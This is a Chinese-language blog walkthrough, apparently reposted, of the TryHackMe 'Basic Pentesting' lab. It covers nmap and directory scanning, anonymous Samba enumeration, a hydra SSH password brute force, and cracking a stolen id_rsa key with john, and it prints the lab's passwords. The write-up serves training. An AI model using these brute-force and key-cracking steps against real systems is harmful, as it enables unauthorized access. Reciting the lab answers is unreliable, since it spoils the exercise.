搜索

【THM】Basic Pentesting-练习


发布时间: 2022-11-24 17:54:13    浏览次数:22 次

观前提示

代码段或者文字段存在过长部分,请使用鼠标左键选中要查看的一行内容,按住鼠标左键并平行向右拖动观看。
或者向右拖动代码段、文字段下方的滚动条,查看过长部分的内容。
因为光线等问题无法看清屏幕中内容的,也可按住鼠标左键不放并向右拖动查看。

本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/basicpentestingjt

Web应用程序测试和权限提升(横向)练习

难度:easy

机器:目标机ip:10.10.144.213、攻击机ip(OPENVPN连接时,为tun0地址):10.14.30.69

相关知识点:

  • 目录爆破
  • hash解密
  • 服务信息枚举
  • Linux信息枚举

操作:

使用nmap进行端口扫描:

nmap -sV -sC -T4 10.10.144.213
#可以使用-oN 将nmap扫描的结果输出为具有普通格式的文本

image

使用 dirsearch/dirbuster 查找Web 服务器的隐藏目录:

image

获取目标机用户名:

方法一:

enum4linux  10.10.144.213

image

方法二:

#由之前的nmap扫描结果可知:目标机运行了Samba服务
#我们尝试使用匿名登录Samba
smbclient //10.10.144.213/anonymous
#发现员工信息,成功获取目标机用户名

image

获取用户用于ssh连接的密码:

hydra -l jan -P rockyou.txt ssh://10.10.144.213 

image

使用ssh登陆目标机的用户账号查看敏感文件

ssh jan@10.10.144.213 -oHostKeyAlgorithms=+ssh-rsa 
#输入密码:armando

image

发现其他用户的hash密钥--id_rsa,将该密钥内容复制到攻击机上的idrsa.id_rsa 中,先对idrsa.id_rsa 进行加权操作,再尝试使用idrsa.id_rsa通过ssh登录另一目标机用户,发现需要密码口令,在攻击机上使用john对idrsa.id_rsa进行hash破解:

chmod 600 idrsa.id_rsa 
# ssh -i idrsa.id_rsa kay@10.10.144.213 -oHostKeyAlgorithms=+ssh-rsa 执行失败 提示输入密码口令
#提取密钥hash值
ssh2john idrsa.id_rsa > id_rsa_hash.txt
#破解hash值
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt

image

使用密码口令和idrsa.id_rsa 通过ssh登陆目标机的另一用户账号,并查看敏感文件信息:

ssh -i idrsa.id_rsa kay@10.10.144.213 -oHostKeyAlgorithms=+ssh-rsa
#输入密码口令 beeswax

image

答题卡

image

免责声明 【THM】Basic Pentesting-练习,资源类别:文本, 浏览次数:22 次, 文件大小:-- , 由本站蜘蛛搜索收录2022-11-24 05:54:13。此页面由程序自动采集,只作交流和学习使用,本站不储存任何资源文件,如有侵权内容请联系我们举报删除, 感谢您对本站的支持。 原文链接:https://www.cnblogs.com/Hekeats-L/p/16786272.html